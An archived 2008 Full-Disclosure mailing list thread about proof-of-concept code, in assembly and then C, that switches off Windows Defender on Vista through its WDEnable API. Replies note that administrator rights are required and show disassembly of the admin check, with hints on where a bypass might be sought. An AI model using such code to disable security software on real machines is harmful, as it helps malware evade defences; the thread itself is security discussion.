Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Full Disclosure: Full-Disclosure

[Wired Security/EOF] Disable Windows Defender (Vista) PoC code

  

 
Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded


skyout.fd at wired-security

May 14, 2008, 9:05 AM

Post #1 of 3 (348 views)
Permalink
[Wired Security/EOF] Disable Windows Defender (Vista) PoC code
Hey guys,

my friend Izee from the EOF-Project(.net) team has coded a
simple PoC code, that demonstrates how to disable the Windows
Defender on Vista (tested with and without SPs on x86/x64)
using its own API made for it.

The API has the following structure:

--- SNIP ---
HRESULT WDEnable(
BOOL fEnable
);
---

Something about the parameter(s):

--- SNIP ---
Parameters

fEnable
[in] Windows Defender status that the calling
application wants to set. TRUE enables Windows
Defender. FALSE disables Windows Defender.
---

Now the interesting thing, what Microsoft says about the security
of this API:

--- SNIP ---
Remarks

The application calling this function must run with
administrator permissions on the local computer. In
Windows Vista, the user is prompted for administrator
permission when the application is running with lower
privileges. Windows Defender also validates proper signing
of the calling process (and all the loaded modules) before
allowing the calling application to change the status. If the
calling process image (or any loaded modules) is not signed
or is flagged as a threat by the Windows Defender signature,
then the call fails with the appropriate error code.
---

And here the code from Izee/EOF, that shows, that this is a lie and nothing
more. The users get fooled...

--- SNIP ---
extrn LoadLibraryA :proc
extrn GetProcAddress :proc
extrn ExitProcess :proc

.data

l db '\Program Files\Windows Defender\MpClient',0
p db 'WDEnable',0

.code

eof proc
push rsp

lea rcx, l
call LoadLibraryA

lea rdx, p
mov rcx, rax
call GetProcAddress

xor rcx, rcx ;Turn Windows Defender off
call rax

call ExitProcess

eof endp
end
---

News: http://wired-security.net/archive/2008/may/index.php#07_2_052008

Sincerely,
SkyOut/Wired Security in corporation with Izee/EOF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


peter.ferrie at gmail

May 14, 2008, 1:49 PM

Post #2 of 3 (329 views)
Permalink
Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code [In reply to]
> my friend Izee from the EOF-Project(.net) team has coded a
> simple PoC code, that demonstrates how to disable the Windows
> Defender on Vista (tested with and without SPs on x86/x64)
> using its own API made for it.

Does he realise that he must be Admin first?
Then he he can just disable the service, or delete the files, or whatever.
Using the API doesn't gain much here.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


fdiggle at gmail

May 14, 2008, 9:10 PM

Post #3 of 3 (316 views)
Permalink
Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code [In reply to]
HAHAHA Fredrick Diggle thinks that skyout was running his el8 assembly
machine program in a debugger running as administrator :( opps...

for the kids to test at home fred diggle has written easier program
which isn't as el8 (fred doesn't know the computer assembly language
as he is lowly zoo worker) but also isn't as dumb

#include "windows.h"
#define INFINITY_PLUS_1 0 // important DO NOT CHANGE
/*
by defining the diggle license agreement secret sauce
you are agreeing that fredrick diggle is far better
than you will ever be and also that you will give him
all your money please
*/
#ifdef DIGGLE_LICENSE_AGREEMENT
typedef int (WINAPI *diggle)(BOOL hippo);
#endif
int main() {
HMODULE dlliggle;
diggle WDEnable;
dlliggle = LoadLibrary(L"C:\\Program Files\\Windows Defender\\MPClient.dll");
WDEnable = (diggle) GetProcAddress(dlliggle, (LPCSTR) "WDEnable");
WDEnable((BOOL)INFINITY_PLUS_1);
return INFINITY_PLUS_1; // <- THIS IS CRITICAL
}

doesn't work if fred is not admin :( <- sad face

Why could this be when skyout says it will?!?!?!?!

from MPClient.dll

WDEnable()
...
.text:30C12858 loc_30C12858: ; CODE XREF:
WDEnable(x)+16Ej
.text:30C12858 call _MpFeatureDisable[at]8 ; THis is
teh call that Matters ++++++
...

MpFeatureDisable()
...
.text:30C0C8A9 lea eax, [ebp+var_4]
.text:30C0C8AC push eax ; int
.text:30C0C8AD push ebx ; int
.text:30C0C8AE call _IsAdminOrSystem[at]8 ;
IsAdminOrSystem(x,x) Opps :((((((((
...

so Fredrick thought in Freds mind, well gee golly this checks if fred
is an admin but I can control this code eh (disclaimer: fred is not
canadian)... so what happens if fred makes this code do "mov DWORD PTR
SS:[EBP-4], 1" instead of that nasty admin checking?

well fred discovered that it basically calls into NdrClientCall2()
which can be viewed for pleasure here ->
http://msdn.microsoft.com/en-us/library/aa374215(VS.85).aspx

see ----v

ClientMpDisableFeature()
...
.text:30C14FBA lea eax, [ebp+arg_0]
.text:30C14FBD push eax
.text:30C14FBE push offset byte_30C01AFE ; pFormat
.text:30C14FC3 push offset pStubDescriptor ; pStubDescriptor
.text:30C14FC8 call _NdrClientCall2 <- HELLo you
devilish monkey
...


and although fred did not reverse this nastiness today he assures skyout that

1) MPClient.dll checks for admin privs (not that it matters)
2) even if it didn't this call wouldn't let you turn off defender
without admin privs, if you want to find a way start ^--- there
3) his children will be plentiful with full heads of hair (but one
might potentially be a midget... :D)

Fred diggle must go see if the hippo brushed his teeth before going to bed now

good bye friends!





On Wed, May 14, 2008 at 3:49 PM, Peter Ferrie <peter.ferrie[at]gmail.com> wrote:
>> my friend Izee from the EOF-Project(.net) team has coded a
>> simple PoC code, that demonstrates how to disable the Windows
>> Defender on Vista (tested with and without SPs on x86/x64)
>> using its own API made for it.
>
> Does he realise that he must be Admin first?
> Then he he can just disable the service, or delete the files, or whatever.
> Using the API doesn't gain much here.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact lists@gossamer-threads.com
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.